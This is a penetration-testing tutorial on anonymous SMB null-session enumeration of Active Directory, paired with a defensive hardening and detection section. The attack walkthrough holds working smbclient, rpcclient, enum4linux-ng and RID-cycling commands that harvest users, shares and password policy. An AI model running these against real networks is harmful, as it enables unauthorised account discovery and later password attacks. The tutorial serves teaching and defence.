SMB Enumeration and Null Session Exploitation

Active Directory
Reading time: 5 minutes.

Introduction / Overview

SMB (Server Message Block) is one of the richest enumeration surfaces in any Active Directory environment. Before you ever touch credentials, a well-configured (or misconfigured) SMB stack can leak users, groups, shares, password policies, and the domain SID. In this article you will learn how to systematically enumerate SMB, when and why null sessions still work, and how to chain enum4linux-ng, smbclient, rpcclient, and RID cycling into a coherent recon workflow. We close with an equally weighted Blue Team section so defenders can shut these techniques down.

Legal / Ethical Disclaimer: Everything below is for education and for authorized security testing only — systems you own or have explicit, written permission to test. Unauthorized scanning or access is illegal in most jurisdictions. Do not run these commands against assets you do not control.

How it works / Background

A null session is an anonymous, unauthenticated SMB connection — you authenticate with an empty username and empty password. Historically, Windows allowed anonymous clients to query the IPC$ share and reach named pipes such as \PIPE\lsarpc, \PIPE\samr, and \PIPE\srvsvc. Through those MS-RPC interfaces (the LSAR, SAMR, and SRVSVC protocols), an anonymous caller could enumerate users, groups, and shares.

Two registry values govern this on Windows:

  • RestrictAnonymous (HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
  • RestrictAnonymousSAM and EveryoneIncludesAnonymous

Modern Windows (2008+ / Samba with restrict anonymous) tightens this, but null sessions still appear constantly on legacy Domain Controllers, NAS appliances, printers, and misconfigured Samba servers.

RID cycling exploits the structure of Windows security identifiers. Every domain account's SID is <domain SID>-<RID>. Well-known RIDs are fixed: 500 is the built-in Administrator, 512 is Domain Admins. By resolving the domain SID once and then iterating RIDs (typically 500–10000+), you can translate each SID back to an account name via the LSAR LsarLookupSids call — even when bulk user enumeration is blocked.

Prerequisites / Lab setup

You need a Linux attack box with the Samba client suite and enum4linux-ng:

sudo apt update
sudo apt install -y smbclient samba-common-bin
pipx install enum4linux-ng        # or: git clone https://github.com/cddmp/enum4linux-ng

For a lab target, any Windows Server DC with RestrictAnonymous=0, or a Samba server configured with server min protocol = NT1 and a guest-friendly share, reproduces the behavior nicely. Identify SMB hosts first:

nmap -p139,445 --open -sV 10.10.10.0/24
nmap --script "smb-protocols,smb-security-mode,smb2-security-mode" -p445 10.10.10.5

smb-security-mode tells you whether message signing is required — a key data point for relay attacks later.

Attack walkthrough / PoC

1. Confirm the null session

Start with smbclient. The -N flag suppresses the password prompt (null auth), and -L lists shares:

smbclient -N -L //10.10.10.5/
# Or explicitly:
smbclient -N -U '' -L //10.10.10.5/

If you get a share list back instead of NT_STATUS_ACCESS_DENIED, anonymous access is allowed. Connect to a readable share:

smbclient -N //10.10.10.5/Public
smb: \> ls
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

2. Broad sweep with enum4linux-ng

enum4linux-ng is the modern, actively maintained rewrite of enum4linux. It orchestrates smbclient, rpcclient, and nmblookup and emits structured YAML/JSON. The -A flag runs all checks:

enum4linux-ng -A 10.10.10.5
# Useful focused runs:
enum4linux-ng -U -G -S -P 10.10.10.5      # users, groups, shares, password policy
enum4linux-ng -R 10.10.10.5               # RID cycling
enum4linux-ng -A -oJ result 10.10.10.5    # write result.json

Pay attention to the password policy output (-P): lockout threshold and minimum password length directly inform whether you can safely password-spray afterward. See also Password Spraying in Active Directory.

3. Manual RPC enumeration with rpcclient

rpcclient gives you surgical control over the MS-RPC calls under the hood. Open a null session:

rpcclient -U '' -N 10.10.10.5

Then issue MS-RPC commands interactively:

rpcclient $> srvinfo                 # OS version / server type
rpcclient $> enumdomusers            # SAMR: list users
rpcclient $> enumdomgroups           # list groups
rpcclient $> querydominfo            # domain name, server role
rpcclient $> lsaquery                # resolve the domain SID
rpcclient $> queryuser 0x1f4         # detail for RID 500 (Administrator)
rpcclient $> getdompwinfo            # password policy

lsaquery returns the domain SID, e.g. S-1-5-21-1004336348-1177238915-682003330. That SID is the seed for RID cycling.

4. RID cycling by hand

Even when enumdomusers is blocked, lookupsids (the LSAR LsarLookupSids call) often is not. Iterate RIDs and resolve names:

for rid in $(seq 500 1100); do
  rpcclient -U '' -N 10.10.10.5 \
    -c "lookupsids S-1-5-21-1004336348-1177238915-682003330-$rid" \
    2>/dev/null | grep -v "S-0-0\|UNKNOWN"
done

A resolved line looks like:

S-1-5-21-1004336348-1177238915-682003330-500 CORP\Administrator (1)
S-1-5-21-1004336348-1177238915-682003330-512 CORP\Domain Admins (2)

The trailing (1) means a user account, (2) a group. enum4linux-ng -R and impacket-lookupsid CORP/'anonymous'@10.10.10.5 automate exactly this loop. The resulting user list feeds directly into AS-REP roasting or Kerberoasting once you confirm valid names.

5. Pull policy and pivot

With a username list in hand, validate accounts and harvest more policy detail, then move toward credentialed enumeration (BloodHound, LDAP). Null-session recon is the on-ramp, not the destination.

Mermaid diagram

SMB Enumeration and Null Session Exploitation diagram 1

Text fallback: discover an SMB host, test for an anonymous null session, list shares, resolve the domain SID, enumerate users/groups, fall back to RID cycling when bulk enumeration is blocked, then use the harvested list and password policy for spraying or roasting.

Detection & Defense (Blue Team)

Anonymous SMB enumeration maps to MITRE ATT&CK T1087 (Account Discovery), T1135 (Network Share Discovery), and T1018 (Remote System Discovery). Treat the following as a baseline hardening checklist.

1. Disable anonymous access. On Windows, enforce via Group Policy (Security Options):

  • Network access: Do not allow anonymous enumeration of SAM accounts, set to Enabled (sets RestrictAnonymousSAM=1).
  • Network access: Do not allow anonymous enumeration of SAM accounts and shares, set to Enabled (sets RestrictAnonymous=1).
  • Network access: Let Everyone permissions apply to anonymous users, set to Disabled (EveryoneIncludesAnonymous=0).
  • Network access: Restrict anonymous access to Named Pipes and Shares, set to Enabled.

# Verify current values
Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' |
  Select-Object RestrictAnonymous, RestrictAnonymousSAM, EveryoneIncludesAnonymous

2. Kill SMBv1 and require signing. SMBv1 (NT1) enables the worst legacy behavior and CVE-2017-0144 (EternalBlue). Remove it and require signing to blunt relay attacks:

# Remove the SMBv1 feature (the cmdlet asks for a restart afterward)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
# Require signing and switch off SMB1 in the server; -Force skips the confirmation prompt
Set-SmbServerConfiguration -RequireSecuritySigning $true -EnableSecuritySigning $true -Force
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

3. Harden Samba on Linux/NAS: set restrict anonymous = 2, server min protocol = SMB2_10 (or higher), avoid map to guest = Bad User, and never set guest ok = yes on sensitive shares.
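As an added check (example code, not from this article or from the Samba project), a small auditor that flags the four smb.conf settings named above. It runs against two constructed configs: the weak lab setup from the Prerequisites section and a hardened counterpart. The Samba defaults it assumes for absent keys are stated in the docstring.

```python
import configparser

# Constructed smb.conf samples (not from any real host). The weak one is the
# lab setup from the Prerequisites section; the hardened one applies the four
# settings recommended in item 3 above.
WEAK_SMB_CONF = """\
[global]
server min protocol = NT1
restrict anonymous = 0
map to guest = Bad User
[Public]
path = /srv/public
guest ok = yes
[Finance]
path = /srv/finance
guest ok = yes
"""
HARDENED_SMB_CONF = """\
[global]
server min protocol = SMB2_10
restrict anonymous = 2
map to guest = Never
[Finance]
path = /srv/finance
guest ok = no
"""
# Samba dialect names in ascending order; everything before SMB2_02 is SMB1.
PROTOCOL_ORDER = ["CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1",
                  "SMB2_02", "SMB2_10", "SMB3_00", "SMB3_02", "SMB3_11"]

def audit_smb_conf(text: str, min_protocol: str = "SMB2_10") -> list:
    """Return findings for the settings this article calls out. Where a key is
    absent the Samba defaults are assumed: restrict anonymous = 0, server min
    protocol = SMB2_02 (Samba 4.11+), map to guest = Never, guest ok = no."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)      # smb.conf is INI-like; configparser lower-cases keys
    g = next((cp[s] for s in cp.sections() if s.lower() == "global"), {})
    findings = []
    if g.get("restrict anonymous", "0").strip() != "2":
        findings.append("global: restrict anonymous should be 2 (anonymous IPC$ still allowed)")
    proto = g.get("server min protocol", "SMB2_02").strip().upper()
    if proto not in PROTOCOL_ORDER or PROTOCOL_ORDER.index(proto) < PROTOCOL_ORDER.index(min_protocol):
        findings.append(f"global: server min protocol = {proto} is below {min_protocol}")
    guest = g.get("map to guest", "Never").strip()
    if guest.lower() != "never":
        findings.append(f"global: map to guest = {guest} turns failed logons into guest access")
    for s in cp.sections():
        if s.lower() != "global" and cp[s].get("guest ok", "no").strip().lower() in ("yes", "true", "1"):
            findings.append(f"[{s}]: guest ok = yes exposes the share to null sessions")
    return findings
```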

4. Detect the behavior. Watch for:

  • Event ID 5140 / 5145 (share access auditing) where the account is ANONYMOUS LOGON.
  • Event ID 4624 Logon Type 3 with account name ANONYMOUS LOGON.
  • A single source hitting IPC$ plus a rapid burst of LsarLookupSids / SAMR calls — the signature of RID cycling. Many EDRs flag sequential SID lookups.

# Splunk-style hunt
EventCode=4624 Logon_Type=3 Account_Name="ANONYMOUS LOGON"
| stats count by Source_Network_Address, dest
| where count > 20

5. Network controls. Block 139/445 at the perimeter, segment DCs, and restrict SMB to management subnets. Honeypot shares with alerting catch enumeration early.
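Added example (not from the original article): the detection logic from item 4 run over constructed Windows event records. It implements the Splunk hunt above as a time-aware sliding window and correlates each flagged source with the IPC$ named pipes it touched in 5145 events; the field names (src, ShareName, RelativeTargetName) are simplified stand-ins for the real 4624/5145 event fields.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events (not real logs). 10.10.14.3 behaves like the by-hand
# RID loop in step 4, which opens a fresh anonymous session per RID and so leaves
# one 4624 (type 3, ANONYMOUS LOGON) plus one 5145 IPC$/lsarpc hit per lookup.
def _ev(t: str, code: int, src: str, **extra) -> dict:
    e = {"time": datetime.fromisoformat(t), "EventCode": code, "src": src,
         "AccountName": "ANONYMOUS LOGON", "LogonType": 3}
    e.update(extra)
    return e

SAMPLE_EVENTS: List[dict] = (
    [_ev(f"2024-05-01T10:00:{i:02d}", 4624, "10.10.14.3") for i in range(40)]
    + [_ev(f"2024-05-01T10:00:{i:02d}", 5145, "10.10.14.3",
           ShareName=r"\\*\IPC$", RelativeTargetName="lsarpc") for i in range(40)]
    + [_ev("2024-05-01T10:05:00", 4624, "10.10.20.7"),          # one benign anonymous logon
       _ev("2024-05-01T10:05:01", 5145, "10.10.20.7",
           ShareName=r"\\*\IPC$", RelativeTargetName="srvsvc")]
)

ENUM_PIPES = {"lsarpc", "samr", "srvsvc"}   # pipes behind the RPC calls in this article

def anonymous_bursts(events: List[dict], window: timedelta = timedelta(seconds=60),
                     threshold: int = 20) -> Dict[str, dict]:
    """Flag sources whose ANONYMOUS LOGON type-3 logons exceed `threshold`
    inside any `window` (the Splunk hunt, made time-aware), and list which
    IPC$ pipes they touched (5145 needs Detailed File Share auditing enabled)."""
    logons: Dict[str, List[datetime]] = defaultdict(list)
    pipes: Dict[str, set] = defaultdict(set)
    for e in events:
        if e.get("AccountName") != "ANONYMOUS LOGON":
            continue
        if e["EventCode"] == 4624 and e.get("LogonType") == 3:
            logons[e["src"]].append(e["time"])
        elif e["EventCode"] == 5145 and e.get("ShareName", "").endswith("IPC$"):
            pipes[e["src"]].add(e.get("RelativeTargetName", ""))
    findings: Dict[str, dict] = {}
    for src, times in logons.items():
        times.sort()
        peak, lo = 0, 0
        for hi, t in enumerate(times):          # sliding window over sorted times
            while t - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            findings[src] = {"peak_logons": peak,
                             "enum_pipes": sorted(pipes[src] & ENUM_PIPES)}
    return findings
```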

Conclusion

Null sessions are a textbook example of "old but not dead." A single anonymous bind can hand an attacker the domain SID, a full user list via RID cycling, the password policy, and a foothold for spraying or roasting — all without a credential. The defenses, however, are equally well understood: disable anonymous enumeration, remove SMBv1, require signing, and audit ANONYMOUS LOGON access. Enumeration discipline wins on both sides of the engagement.
